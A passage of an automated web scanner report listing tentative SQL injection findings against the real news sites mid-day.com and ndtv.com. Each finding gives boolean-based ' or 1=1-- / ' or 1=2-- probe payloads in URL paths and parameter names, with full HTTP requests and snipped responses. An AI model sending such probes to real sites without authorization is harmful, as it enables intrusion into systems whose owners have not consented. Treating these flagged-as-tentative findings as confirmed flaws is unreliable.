Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/local/index.htm20305888'%20or%201%3d1--%20/x26amp HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Sun, 04 Sep 2011 14:40:50 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 248
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /news/local/index.htm20305888' or 1=1-- /x26amp
on this server.</p>
</body></html>

Request 2

GET /news/local/index.htm20305888'%20or%201%3d2--%20/x26amp HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 27
Date: Sun, 04 Sep 2011 04:40:19 GMT
Expires: Sun, 04 Sep 2011 16:40:23 GMT
Content-Length: 10130
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Mid-Day :: Make Work Fun Mr52 :)</title>
<link rel="icon" type="image/gif" href="http://www.mid-day.com/favicon.gif">

<META NAME=DESCRIPTION CONTENT="Sitemap, Information about Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Zing">
<META NAME=KEYWORDS CONTENT="Sitemap, Sitemap Mid-day, Mid-day Multimedia, Mid-day newspaper, Radio One, Inqualab, Gujrati Mid-Day, Gujarati Mid-Day, Zing">

<link rel="stylesheet" type="text/css" href="/css/p6/sectionpages110211.css" />
<script language="Javascript" type="text/javascript" src="/js/template.js"></script>

<script type="text/javascript">
   var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
   document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>

<script type="text/javascript">
   try {
   var pageTracker = _gat._getTracker("UA-2326030-1");
   pageTracker._trackPageview();
   } catch(err) {}
</script>
<meta name="verify-v1" content="/MGyGcAq/7+MnbAx7dhTyOl/Y/zwF853UVG9PEhDT7o=" />

<style type="text/css">
#articlelist .heading { padding-top:10px;}
#articlelist .slug{ font-family:arial; font-size:12; font-weight:normal; color:#000;}
#articlelist .heading a { font-family:arial; font-size:12; font-weight:bold; color:#0072FF; text-decoration:none;}
#articlelist .heading a:hover {text-decoration:underline;}

</style>

</head>

<body>
<table width="1000" border="0" align="center" cellpadding="0" cellspacing="0" id=
...[SNIP]...

1.9. http://www.mid-day.com/news/local/index.htm/x26amp [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.mid-day.com
Path:	/news/local/index.htm/x26amp

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 19887943'%20or%201%3d1--%20 and 19887943'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/local/index.htm/x26amp19887943'%20or%201%3d1--%20 HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Sun, 04 Sep 2011 14:40:58 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 248
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /news/local/index.htm/x26amp19887943' or 1=1--
on this server.</p>
</body></html>

Request 2

GET /news/local/index.htm/x26amp19887943'%20or%201%3d2--%20 HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:40:59 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Local News - National News, Indian News, Complete coverage of local news from India</title>
<link rel="icon" type="image/gif" href="http://www.mid-day.com/favicon.gif">

<META NAME=DESCRIPTION CONTENT="Get your latest dose of local Indian news from MiD DAY, the latest happenings from Mumbai, Bangalore, Delhi, Pune and the rest of India. News, Opinion, Entertaintment, Sports, life@Work, Comics & Fun, Sex & Relationship, What's On, Specials, Lifestyle. Read the latest Mumbai News, local Mumbai City News, local Bangalore City News, latest Bangalore News, local Delhi City News, latest Delhi News, local Pune City News, latest Pune News">
<META NAME=KEYWORDS CONTENT="Local news, Local Indian news, india news, India city News, India city Search, Indian city Movies, Cricket, Mumbai, mumbai city news, what's on, classifieds, delhi news, bangalore city news, local city, india, india local city news, mumbai, delhi, bangalore">

<link rel="stylesheet" type="text/css" href="/css/pV/sectionpages060709.css" />
<link rel="stylesheet" type="text/css" href="/css/pV/ddlevelsmenu-base-07-04-09.css">
<link rel="stylesheet" type="text/css" href="/css/pV/ddlevelsmenu-bar-07-04-09.css">

<script language="Javascript" type="text/javascript" src="/js/realmedia.js"></script>
<script language="Javascript" type="text/javascript" src="/js/template.js"></script>
<script language="Javascript" type="text/javascript" src="/js/pV/ddlevelsmenu.js"></script>

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript
...[SNIP]...

1.10. http://www.mid-day.com/news/local/index.htm/x26amp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.mid-day.com
Path:	/news/local/index.htm/x26amp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 18183999%20or%201%3d1--%20 and 18183999%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/local/index.htm/x26amp?118183999%20or%201%3d1--%20=1 HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Sun, 04 Sep 2011 14:40:30 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 229
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /news/local/index.htm/x26amp
on this server.</p>
</body></html>

Request 2

GET /news/local/index.htm/x26amp?118183999%20or%201%3d2--%20=1 HTTP/1.1
Host: www.mid-day.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:40:30 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Local News - National News, Indian News, Complete coverage of local news from India</title>
<link rel="icon" type="image/gif" href="http://www.mid-day.com/favicon.gif">

<META NAME=DESCRIPTION CONTENT="Get your latest dose of local Indian news from MiD DAY, the latest happenings from Mumbai, Bangalore, Delhi, Pune and the rest of India. News, Opinion, Entertaintment, Sports, life@Work, Comics & Fun, Sex & Relationship, What's On, Specials, Lifestyle. Read the latest Mumbai News, local Mumbai City News, local Bangalore City News, latest Bangalore News, local Delhi City News, latest Delhi News, local Pune City News, latest Pune News">
<META NAME=KEYWORDS CONTENT="Local news, Local Indian news, india news, India city News, India city Search, Indian city Movies, Cricket, Mumbai, mumbai city news, what's on, classifieds, delhi news, bangalore city news, local city, india, india local city news, mumbai, delhi, bangalore">

<link rel="stylesheet" type="text/css" href="/css/pV/sectionpages060709.css" />
<link rel="stylesheet" type="text/css" href="/css/pV/ddlevelsmenu-base-07-04-09.css">
<link rel="stylesheet" type="text/css" href="/css/pV/ddlevelsmenu-bar-07-04-09.css">

<script language="Javascript" type="text/javascript" src="/js/realmedia.js"></script>
<script language="Javascript" type="text/javascript" src="/js/template.js"></script>
<script language="Javascript" type="text/javascript" src="/js/pV/ddlevelsmenu.js"></script>

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript
...[SNIP]...

1.11. http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.ndtv.com
Path:	/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 14708257%20or%201%3d1--%20 and 14708257%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142?114708257%20or%201%3d1--%20=1 HTTP/1.1
Host: www.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=bangkok+thailand+news#sclient=psy&hl=en&source=hp&q=mumbay+news&pbx=1&oq=mumbay+news&aq=f&aqi=g-c5&aql=&gs_sm=e&gs_upl=32342l36076l0l37100l8l7l1l0l0l4l1052l4032l3-1.1.1.2.1l6l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 69784
Cache-Control: max-age=120
Expires: Sun, 04 Sep 2011 02:34:22 GMT
Date: Sun, 04 Sep 2011 02:32:22 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
</li>
</ul>
</div>
<div class="clr"></div>
<div class="also_see_n">
<a class="prev prev_browse left"></a>
<div class="scrollable">
<div class="items">
<div class="item">
<a href="/video/player/news/mumbai-airport-runway-revamped/200802" title="Mumbai airport runway revamped">
<img src="http://drop.ndtv.com/videothumb/thumb_200802_1306476912.jpg" width="75" height="60" alt="" />
<span>Mumbai airport runway revamped</span>
</a>
</div>
<div class="item">
<a href="/video/player/news/bipasha-detained-at-mumbai-airport/200689" title="Bipasha detained at Mumbai airport">
<img src="http://drop.ndtv.com/videothumb/thumb_200689_1306395956.jpg" width="75" height="60" alt="" />
<span>Bipasha detained at Mumbai airport</span>
</a>
</div>
<div class="item">
<a href="/video/player/news/minissha-lamba-detained-at-mumbai-airport/199920" title="Minissha Lamba detained at Mumbai airport">
<img src="http://drop.ndtv.com/videothumb/thumb_199920_1305721413.jpg" width="75" height="60" alt="" />
<span>Minissha Lamba detained at Mumbai airport</span>
</a>
</div>
<div class="item">
<a href="/video/player/news/pilots-strike-chaos-nightmare-inside-airports/198116" title="Pilots' strike: Chaos, nightmare inside airports">
<img src="http://drop.ndtv.com/videothumb/thumb_198116_1304502010.jpg" width="75" height="60" alt="" />
<span>Pilots' strike: Chaos, nightmare inside airpo ...</span>
</a>

...[SNIP]...

Request 2

GET /article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142?114708257%20or%201%3d2--%20=1 HTTP/1.1
Host: www.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=bangkok+thailand+news#sclient=psy&hl=en&source=hp&q=mumbay+news&pbx=1&oq=mumbay+news&aq=f&aqi=g-c5&aql=&gs_sm=e&gs_upl=32342l36076l0l37100l8l7l1l0l0l4l1052l4032l3-1.1.1.2.1l6l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 70003
Cache-Control: max-age=117
Expires: Sun, 04 Sep 2011 02:34:19 GMT
Date: Sun, 04 Sep 2011 02:32:22 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
</li>
<li><a href="http://www.ndtv.com/article/india/anushka-sharma-questioned-at-mumbai-airport-115128">Anushka Sharma questioned at Mumbai airport </a></li>
</ul>
</div>
<div class="clr"></div>
<div class="also_see_n">
<a class="prev prev_browse left"></a>
<div class="scrollable">
<div class="items">
<div class="item">
<a href="/video/player/news/mumbai-airport-runway-revamped/200802" title="Mumbai airport runway revamped">
<img src="http://drop.ndtv.com/videothumb/thumb_200802_1306476912.jpg" width="75" height="60" alt="" />
<span>Mumbai airport runway revamped</span>
</a>
</div>
<div class="item">
<a href="/video/player/news/bipasha-detained-at-mumbai-airport/200689" title="Bipasha detained at Mumbai airport">
<img src="http://drop.ndtv.com/videothumb/thumb_200689_1306395956.jpg" width="75" height="60" alt="" />
<span>Bipasha detained at Mumbai airport</span>
</a>
</div>
<div class="item">
<a href="/video/player/news/minissha-lamba-detained-at-mumbai-airport/199920" title="Minissha Lamba detained at Mumbai airport">
<img src="http://drop.ndtv.com/videothumb/thumb_199920_1305721413.jpg" width="75" height="60" alt="" />
<span>Minissha Lamba detained at Mumbai airport</span>
</a>
</div>
<div class="item">
<a href="/video/player/news/pilots-strike-chaos-nightmare-inside-airports/198116" title="Pilots' strike: Chaos, nightmare inside airports">
<
...[SNIP]...

1.12. http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.ndtv.com
Path:	/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 17974436'%20or%201%3d1--%20 and 17974436'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /article/india17974436'%20or%201%3d1--%20/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917 HTTP/1.1
Host: www.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAS_SC1=1315103177650; __utma=165355488.441276387.1315103188.1315103188.1315103188.1; __utmb=165355488.2.10.1315103194; __utmc=165355488; __utmz=165355488.1315103194.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _chartbeat2=wijp1ux6nq7l2qhl

Response 1

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 68827
Cache-Control: max-age=569
Expires: Sun, 04 Sep 2011 03:36:33 GMT
Date: Sun, 04 Sep 2011 03:27:04 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
<a href="http://www.ndtv.com/article/cities/mumbai-airports-main-runway-shut-till-11-pm-flights-delayed-131003">Mumbai airport's main runway shut till 11 pm, flights delayed</a></li>
<li><a href="http://www.ndtv.com/article/india/turkish-airways-plane-still-stuck-in-mud-mumbai-runway-closed-130722">Turkish Airways plane still stuck in mud, Mumbai runway closed</a></li>
<li><a href="http://www.ndtv.com/article/cities/rich-haul-at-mumbai-airport-woman-caught-with-75k-euros-125914">Rich Haul at Mumbai airport: Woman caught with 75K Euros</a></li>
<li><a href="http://www.ndtv.com/article/cities/50-yr-old-nri-woman-caught-with-sex-toys-at-mumbai-airport-120385">50-yr-old NRI woman caught with sex toys at Mumbai airport </a></li>
<li><a href="http://www.ndtv.com/article/india/bangalore-police-on-toes-after-mumbai-blasts-119211">Bangalore police on toes after Mumbai blasts</a></li>
</ul>
</div>
<div class="clr"></div>
<div class="also_see_n">
<a class="prev prev_browse left"></a>
<div class="scrollable">
<div class="items">
<div class="item">
<a href="/video/player/news/mumbai-airport-s-main-runway-shut-till-11-pm-flights-delayed/209811" title="Mumbai airport's main runway shut till 11 pm, flights delayed">
<img src="http://drop.ndtv.com/videothumb/thumb_209811_1315069236.jpg" width="75" height="60" alt="" />
<span>Mumbai airport's main runway shut till 11 pm, ...</span>
</a>
</div>
<div class="item">
<a href="/video/player/news/mumbai-plane-skids-off-runway-closed/209620" title="Mumbai: Plane ski
...[SNIP]...

Request 2

GET /article/india17974436'%20or%201%3d2--%20/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917 HTTP/1.1
Host: www.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAS_SC1=1315103177650; __utma=165355488.441276387.1315103188.1315103188.1315103188.1; __utmb=165355488.2.10.1315103194; __utmc=165355488; __utmz=165355488.1315103194.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _chartbeat2=wijp1ux6nq7l2qhl

Response 2

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 68797
Cache-Control: max-age=600
Expires: Sun, 04 Sep 2011 03:37:05 GMT
Date: Sun, 04 Sep 2011 03:27:05 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
<a href="http://www.ndtv.com/article/cities/mumbai-airports-main-runway-still-shut-flights-delayed-131003">Mumbai airport's main runway still shut, flights delayed</a></li>
<li><a href="http://www.ndtv.com/article/india/turkish-airways-plane-still-stuck-in-mud-mumbai-runway-closed-130722">Turkish Airways plane still stuck in mud, Mumbai runway closed</a></li>
<li><a href="http://www.ndtv.com/article/cities/rich-haul-at-mumbai-airport-woman-caught-with-75k-euros-125914">Rich Haul at Mumbai airport: Woman caught with 75K Euros</a></li>
<li><a href="http://www.ndtv.com/article/cities/50-yr-old-nri-woman-caught-with-sex-toys-at-mumbai-airport-120385">50-yr-old NRI woman caught with sex toys at Mumbai airport </a></li>
<li><a href="http://www.ndtv.com/article/india/bangalore-police-on-toes-after-mumbai-blasts-119211">Bangalore police on toes after Mumbai blasts</a></li>
</ul>
</div>
<div class="clr"></div>
<div class="also_see_n">
<a class="prev prev_browse left"></a>
<div class="scrollable">
<div class="items">
<div class="item">
<a href="/video/player/news/mumbai-airport-s-main-runway-shut-till-11-pm-flights-delayed/209811" title="Mumbai airport's main runway shut till 11 pm, flights delayed">
<img src="http://drop.ndtv.com/videothumb/thumb_209811_1315069236.jpg" width="75" height="60" alt="" />
<span>Mumbai airport's main runway shut till 11 pm, ...</span>
</a>
</div>
<div class="item">
<a href="/video/player/news/mumbai-plane-skids-off-runway-closed/209620" title="Mumbai: Plane skids off, run
...[SNIP]...

1.13. http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.ndtv.com
Path:	/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 11599280%20or%201%3d1--%20 and 11599280%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917?111599280%20or%201%3d1--%20=1 HTTP/1.1
Host: www.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAS_SC1=1315103177650; __utma=165355488.441276387.1315103188.1315103188.1315103188.1; __utmb=165355488.2.10.1315103194; __utmc=165355488; __utmz=165355488.1315103194.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _chartbeat2=wijp1ux6nq7l2qhl

Response 1

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 68778
Cache-Control: max-age=548
Expires: Sun, 04 Sep 2011 03:35:51 GMT
Date: Sun, 04 Sep 2011 03:26:43 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
<a href="http://www.ndtv.com/article/cities/mumbai-airports-main-runway-still-shut-flights-delayed-131003">Mumbai airport's main runway still shut, flights delayed</a></li>
<li><a href="http://www.ndtv.com/article/india/turkish-airways-plane-still-stuck-in-mud-mumbai-runway-closed-130722">Turkish Airways plane still stuck in mud, Mumbai runway closed</a></li>
<li><a href="http://www.ndtv.com/article/cities/rich-haul-at-mumbai-airport-woman-caught-with-75k-euros-125914">Rich Haul at Mumbai airport: Woman caught with 75K Euros</a></li>
<li><a href="http://www.ndtv.com/article/cities/50-yr-old-nri-woman-caught-with-sex-toys-at-mumbai-airport-120385">50-yr-old NRI woman caught with sex toys at Mumbai airport </a></li>
<li><a href="http://www.ndtv.com/article/india/bangalore-police-on-toes-after-mumbai-blasts-119211">Bangalore police on toes after Mumbai blasts</a></li>
</ul>
</div>
<div class="clr"></div>
<div class="also_see_n">
<a class="prev prev_browse left"></a>
<div class="scrollable">
<div class="items">
<div class="item">
<a href="/video/player/news/mumbai-airport-s-main-runway-shut-till-11-pm-flights-delayed/209811" title="Mumbai airport's main runway shut till 11 pm, flights delayed">
<img src="http://drop.ndtv.com/videothumb/thumb_209811_1315069236.jpg" width="75" height="60" alt="" />
<span>Mumbai airport's main runway shut till 11 pm, ...</span>
</a>
</div>
<div class="item">
<a href="/video/player/news/mumbai-plane-skids-off-runway-closed/209620" title="Mumbai: Plane skids off, runway cl
...[SNIP]...

Request 2

GET /article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917?111599280%20or%201%3d2--%20=1 HTTP/1.1
Host: www.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAS_SC1=1315103177650; __utma=165355488.441276387.1315103188.1315103188.1315103188.1; __utmb=165355488.2.10.1315103194; __utmc=165355488; __utmz=165355488.1315103194.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _chartbeat2=wijp1ux6nq7l2qhl

Response 2

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 68808
Cache-Control: max-age=600
Expires: Sun, 04 Sep 2011 03:36:44 GMT
Date: Sun, 04 Sep 2011 03:26:44 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
<a href="http://www.ndtv.com/article/cities/mumbai-airports-main-runway-shut-till-11-pm-flights-delayed-131003">Mumbai airport's main runway shut till 11 pm, flights delayed</a></li>
<li><a href="http://www.ndtv.com/article/india/turkish-airways-plane-still-stuck-in-mud-mumbai-runway-closed-130722">Turkish Airways plane still stuck in mud, Mumbai runway closed</a></li>
<li><a href="http://www.ndtv.com/article/cities/rich-haul-at-mumbai-airport-woman-caught-with-75k-euros-125914">Rich Haul at Mumbai airport: Woman caught with 75K Euros</a></li>
<li><a href="http://www.ndtv.com/article/cities/50-yr-old-nri-woman-caught-with-sex-toys-at-mumbai-airport-120385">50-yr-old NRI woman caught with sex toys at Mumbai airport </a></li>
<li><a href="http://www.ndtv.com/article/india/bangalore-police-on-toes-after-mumbai-blasts-119211">Bangalore police on toes after Mumbai blasts</a></li>
</ul>
</div>
<div class="clr"></div>
<div class="also_see_n">
<a class="prev prev_browse left"></a>
<div class="scrollable">
<div class="items">
<div class="item">
<a href="/video/player/news/mumbai-airport-s-main-runway-shut-till-11-pm-flights-delayed/209811" title="Mumbai airport's main runway shut till 11 pm, flights delayed">
<img src="http://drop.ndtv.com/videothumb/thumb_209811_1315069236.jpg" width="75" height="60" alt="" />
<span>Mumbai airport's main runway shut till 11 pm, ...</span>
</a>
</div>
<div class="item">
